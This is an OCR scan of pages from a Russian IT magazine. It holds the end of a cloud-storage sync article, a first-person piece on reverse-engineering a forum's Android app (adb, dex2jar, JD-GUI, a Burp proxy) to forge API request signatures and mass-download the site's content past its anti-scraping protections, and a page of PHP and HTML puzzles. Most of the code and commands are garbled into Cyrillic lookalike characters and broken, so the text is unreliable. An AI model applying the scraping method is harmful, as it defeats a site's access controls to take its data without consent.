ла на диске позже даты последнего изменения файла в облаке); 

4. файлы (каталоги), которые нужно выгрузить из облака на локальный диск 
(дата последнего изменения файла в облаке позже даты последнего из- 
менения файла на диске). 

После формирования списков запускается синхронизация каталога и об- 
лака, которая представляет собой последовательность операций загрузки 
и удаления файлов (каталогов). 

Описание таймера 

Буз'Ьет.Тітегз . Тітег таіпТітег = пе Бузует. Тіт егз .Тітег( ) ; 

// Описание метода, вызываемого при срабатывании таймера 

таіпТітег. ЕІарзесІ += пен ЕІарзесІЕѵепіНапсЛег(ОпТітегЕѵепі) ; 

// Установка времени срабатывания таймера 

таіпТітег Лпіегѵаі = Ті тегіпѣегѵаі ; 

таіпТітег. ЕпаЫесІ = ігие ; 

// Использование метода КеерАІіѵе для предотвращения 

// обработки таймера механизмом сборки мусора 

СС. КеерАІіѵе (таіпТігоегХ» 

РАЗРЕШЕНИЕ КОНФЛИКТОВ ДОСТУПА 

Разрабатывая многопользовательское приложение, мы учитывали возмож- 
ность возникновения ситуаций, в которых несколько клиентов попытаются од- 
новременно выполнить загрузку или удаление одного и того же файла в хра- 
нилище. Механизм разрешения конфликтов доступа у нас сейчас реализован 
на основе сессий, которые создаются при регистрации клиента на сервере. 

Предлагаемый механизм заключается в следующем. Клиент при выпол- 
нении операции загрузки или удалении файла должен проанализировать 
список сессий на сервере. Если хотя бы в одной из сессий встречается имя 
файла, который клиент собирается удалить или загрузить, выполнение опе- 
рации над файлом откладывается. Если же имя файла не найдено в списке 
сессий, клиент обновляет информацию о своей сессии, устанавливая имя 
файла, с которым он выполняет работу. После выполнения операции с фай- 
лом информация об активном файле удаляется. 

ЗАКЛЮЧЕНИЕ 

Описанный проект включает весь необходимый функционал для организации 
облачного хранилища файлов. Конечно, ты можешь улучшить наш проект, на- 
пример повысить производительность сервера за счет увеличения количе- 
ства экземпляров ѵѵогкег-ролей. Но помни, что в этом случае нужно будет ре- 
ализовать алгоритм синхронизации данных между этими экземплярами, так 
как клиенты, подключенные к разным экземплярам ѵѵогкег-ролей, по умолча- 
нию взаимодействовать не могут. НЕ 







Кодинг 
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ФОРУМ с помощью 

РЕВЕРСИНГА ЕГО 
АИОВОЮ-ПРИЛОЖЕНИЯ 



Артем «Папкой» Смирнов, 
генеральный директор 
ѴѴІА-6ате$ Ш 

а.5тігпоѵ@иіа-дате5,пе1 



Встала передо мной задача: слить контент одного огромного международного сайта 
с двадцатилетней историей и соответствующим количеством пользователей. Но вот 
досада — на сайте стоит достаточно умная защита, контент генерируется иаѵаЗсгірІ, 
а за хоть сколько-нибудь значимое количество запросов можно угодить в бан по ІР... 




озаморачивавшись немного с прокси и эмуляцией 
Заѵа$сгір{, я вдруг вспомнил, что у многих серви- 
сов сейчас, помимо сайта, есть и мобильные при- 
ложения. Полез в Соодіе РІау — и действительно, 
есть! Теперь, когда мне это стало известно, задача 
зазвучала чуть по-другому — отреверсить приложение, полу- 
чить доступ к закрытому АРІ и сего помощью выкачать контент. 

ДЕКОМПИЛЯЦИЯ 

Первое, что нужно сделать, — естественно, скачать приложение 
на девайс. После установки АРК копируется в директорию /сІаТа/ 
арр, и выкачать его оттуда можно такой вот нехитрой командой: 

асІЬ риіі /сІа'Ьа/арр/зоте. раскате . пате-1. арк , 

После успешного выполнения команды получаем искомый АРК 
в текущей директории. 

Как ты, наверное, знаешь, приложения для АпсІгоісІ пишутся 
на Заѵа, однако собранный пакет от «обычной» джавы отлича- 
ется. А для декомпиляции нам нужен иАВ-файл. Не беда, на по- 
мощь приходит мегаполезная утилита бех2іаг: 

. /с!ех2^’аг. 5Іі зоте. раскате. пате-1. арк 

Все, у нас есть 8АП. 

Теперь нам поможет программа иР — Заѵа Ресотрііег. 
Советую использовать зііапсіаіопе-версию под названием иэ- 
0111. Запускаем ее. 

Нажимаем <СтсІ + 0> (или <С*гІ + 0>} и выбираем наш 
8АВ, после чего видим следующую картину (на скриншоте 
не то приложение, которое рассматривается в статье, но суть 
должна быть ясна). иР декомпилирует приложения достаточно 
качественно, единственный недостаток — имена локальных 
переменных он не восстанавливает, поэтому со сложными ал- 
горитмами разобраться тяжело. 

Хорошо, оставим пока декомпилятор и попробуем посмо- 
треть, какие запросы выполняет приложение. 

СНИФФИМАЫОПОІО 

В принципе, подойдет и ѴѴІгезІпагк, но мне больше по душе 
пришлась софтинка с названием Вигр Зиііе, написанная 
на Лаѵа. Нам вполне хватит Ргее ЕсШіоп. 

Запускаем Вигр 8иі*е, открываем вкладку Ргоху, нажима- 
ем на «Іпіегсері із...». Что она делает? Поднимает локальный 
прокси-сервер с портом 8080. Теперь запускаем эмулятор 
Апсігоісі, но не из АѴР, а из терминала вот такой вот командой: 

етиіа^ог -аѵсі аѵсі_пате -іѵЕ'Ер-ргохѵ 

Ь«р: //127.0.0.1:8080 

Здесь аѵбпате — имя виртуального девайса, созданного 
ранее. 

Теперь можно убедиться в том, что прокси работает, — откры- 
ваем на эмуляторе браузер, в нем любую страницу и смотрим, 
что пишет Вигр Зиііе. Небольшая особенность его работы — 
по умолчанию он «холдит» пакет, предоставляя пользователю 
возможность пропустить его далее либо дропнуть. Особенность 
важная, поскольку, если вовремя его не успеть пропустить, софт 
на эмуляторе может решить, что произошел тайм-аут операции. 
Хорошо, теперь ставим нашу софтину: 

асІЬ -е іпзбаі і з оте. раскаде. пате -1 .а рк 

и запускаем ее на эмуляторе. Выявляем наиболее важные 
для нас запросы (ура, видим хост арі.зотезКе.сот!}, пытаем- 
ся выполнить запрос в браузере компьютера — все ОК, в ответ 
приходит 880ІЧ! 

Хорошо, предположим, что в параметрах фигурирует не- 
кий 10=1 , а нам нужен \0=2. Изменяем в скопированном запро- 
се 1 на 2, выполняем его в браузере — а хрен там, получаем 
ошибку! Вглядываемся в запрос и видим некий параметр, на- 
зовем его зідпаіиге, и содержимое его подозрительно похоже 
на хеш :). 

Смотрим на эмуляторе, как меняется зідпаіиге в зависимости 
от Ю, — да, он все же меняется при смене любого параметра. 
Хорошо, значит, придется реверсить приложение. 



ѵѵѵѵѵѵ 

^-СІА: 

сІех2)аг: 

1 I I д \ ■ I О / у/ 1 I И I. 

Вигр ЗиЛе Ргее: 



иО-СШ: декомпили 
рованный код 



РЕВЕРСИНГ 

Вернемся к Заѵа Оесотрііег. Подзадача сейчас стоит сле- 
дующая — понять, каким образом генерируется параметр 
зідпаіиге. Можно поискать встроенным поиском, но мне такой 
метод не нравится, поэтому я делаю следующее: 

1. Сохраняем все исходники в отдельную директорию (Рііе — 
Заѵе аІІ зоигсез). 

2. Переходим в терминале в эту директорию и грепаем: 

РіпсІ . -іпате "*оаѵа" | хаг^з 
§гер "зіёпа1:иге=" -$1 

На выходе получаем список путей до всех файлов, в которых 
содержится текст «зідпа1:иге=». В моем случае их всего один :). 
Хорошо, теперь: 

ѵіт Боте/раскаее/пате/ІтЬ'Ьр/БотеСІазз . ]аѵа 

и изучаем исходники. Алгоритм генерирования подписи я на- 
шел за пару минут, еще за столько же переписал на бумажку. 
Да, это действительно хеш (из семейства ЗНА-*). 

За десять минут алгоритм был переписан на РуМіоп (нра- 
вится мне на нем парсеры писать, и все тут). Я даже хотел 
было подключить прокси, но потом подумал — а действитель- 
но ли это нужно? 

И действительно — оказалось не нужно, весь контент 
для АРІ отдавался без каких-либо лимитов :). 

ИТОГ 

В итоге за несколько дней было выкачано много сотен тысяч 
страниц, причем прелесть такого подхода не только в отсут- 
ствии лимитов, но и в небольшом размере передаваемого кон- 
тента — данные в ЗЗОЫ весят в разы меньше, нежели НТМІ_- 
страница с версткой. 

Какой из этого можно сделать вывод? Вывод простой: 
ты не сможешь полностью защитить данные. Единствен- 
ное, что могло бы усложнить задачу, — это наличие лимитов, 
но и эта проблема легко решается с помощью прокси. Ис- 
пользование НТТРЗ никак не спасает — я просто пошел лег- 
ким путем, решив сниффать трафик, и даже если бы он был 
защищен, можно было бы вытащить необходимые параметры 
для формирования запроса все тем же реверсингом. 

Еще немного усложнило бы задачу использование нативной 
библиотеки для подписывания запроса. Это решение отбросило 
бы «начинающих», но я, например, тоже знаю про ЛМІ. В общем, 
мы с коллегами потратили достаточно большое количество вре- 
мени на поиск решения проблемы, но, увы, так и не нашли. Если 
у тебя есть какие-то мысли по этому поводу — лиши на почту. 

До новых встреч :). ЗС 
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СПЕЦПОДГОН: ПАРТИЯ НОВЫХ ЗАДАЧ 
ОТ КОМПАНИИ 50РТЫЫЕ 



< ?рЬр 

$5Ѵаг1 - "Неііо. могісі ! " ; 

$ 5 Ѵаг 2 = 

$5ѴагЗ =_ ^ 



{ 



•рООІХ) 

[1 $5Ѵаг1, $5Ѵаг2; 



$5Ѵаг2 = &$зѴаг1і 



1 

і 



} 



^ 002 ( ) 

1 $$Ѵаг1; 



$е_ЮВА15|^5ѴагЗ , и_ = &$5Ѵаг1і 



Гоо1() ; 

есМо "5Ѵ аг2 - ^БѴагг'Ѵп"; 
+оо2{).; 

есНо "ьѴагЗ = 1 ІзѴа гЗ 1 \п" ; 
?> 



а) $а = (іпі) ( (0.1+0. 7) * 10 ); 

б) $а = 90; 

$а += ++$а; 



< ?рЬр 

$а = аггаѵ( 1=>1Ѳ . 2=>20, 3^>30)_і 



$Ь — &$з [ 1 1 ^ 

$а Г 1 1 = $а[2]_і_ 

?а ГП = МаЩі 

есМо $Ь^ 

?> 



Рис. 1 . Тот самый ромб, который тебе 
придется сделать 



Исправьте имеющийся код, чтобы получить ре- 
зультат на картинке. Код должен работать в по- 
следних версиях браузеров Сбготе, Рігеіох, 
ЗаТагі, Орега, а также ІЕ9, ІЕЮ. 

Что в приведенном коде является неправиль- 
ным и почему? Удалось ли вам получить идентич- 
ный результат во всех браузерах? 

Данная задача была протестирована в брау- 
зерах ІЕ9, ІЕЮ, ѴѴіпсІоѵ/з Заіагі 5.1 .7, Орега 12.15, 
Рігеіох 20.0.1, СІіготе 26.0.1410.64 т. 

Рис. 2. Результат выполне- 
ния кода из этой задачи 

< ! РОСТУ РЕ ІтЬт1> 



<Іп 1 :т 1 > 

<Ие асІ> 

<ѣі1:1е>5оте ТіТ 1е</ іі~Ые > 



<те*а 1г1;1:ргеяиіѵ= ,, Соп'Ьеп^-Туре" 
соп1;еп'Ь=' , 1:ех'Ь/Іі1:т1і_ сМарае^ы^-В" /> 



<5Іу1е 1:ур е="Тех1:/с5 5"> 
Ьосіу { 

расІсІіп§: 100рх; 

> 



. еіетепѣ { 
іл/ісИ:Ьх20Ѳрхі 
Ьеі§ІгТ : ІѲѲрхі 



Ьаск§гоипс1_: ^Ііпеаг^гасііепім 

(ѣо Ьо’ЬЬот., #269ае2 

#83 с ее 2 100% X; 



611:ег^ рго§і<і : 0ХІта§еТ гапБ-Рогт .«-■ 

Місг050І : Ь.ёгасііеп'Ь=! 

(5І:аг'ЬСо1оГ5'1:г= '#269ае2 1 . 

епс)Со1ог5І:г= ' #83сее2 ' , 

СгасІіеп1;Туре=0 

со1ор: #~Н"Г; 



ЬехЬ-а Іі^ п : сепіі ег : 

Ііпе- ЬеікІтІ: : 100рх^ 

/РопЬ :Д8рх Сео.рціа л Бері-Р,; 

ЬехЬ-БЬасіоы: 0 Ірх 2рх #00437А; 
Ьоггіер-гасііиБ :2©рх; 

Ьогсіег: Ірх боіісі #ЗР7йС9; 

сопЬепІ: : ЧІеІІо іліорісГ ; 

> 



< / 5~Еу 1е > 
</ЬеасІ> 



< Ьосіу > 

< сііѵ с1а5 5="е1етеп’Ь" > 
< / сі і ѵ > 

< /Ьосіу > 

</ІгРт1> 



МЫ ЖДЕМ ВАШИХ ЗАДАЧЕК! 

ІТ-компании, шлите нам свои задачки! Интересные и оригинальные задачки мы совершенно безвозмездно поставим перед 
нашими читателями. То есть для того, чтобы опубликовать свои программерские и просто логические задания в этой рубрике, 
не нужно никакой бюрократии! Не нужны переписки с инстанциями и отделами, акты приема-передачи работ, подписи, счета 
и визы. Достаточно просто написать на ІогоѵзкѵсЗДІс.ги и установить близкий контакт третьей степени с редактором рубрики. 
Вы шлете задачки, мы их публикуем. Взаимовыгодно! Да, и про бонусы читател ям-решателям не забывайте! 








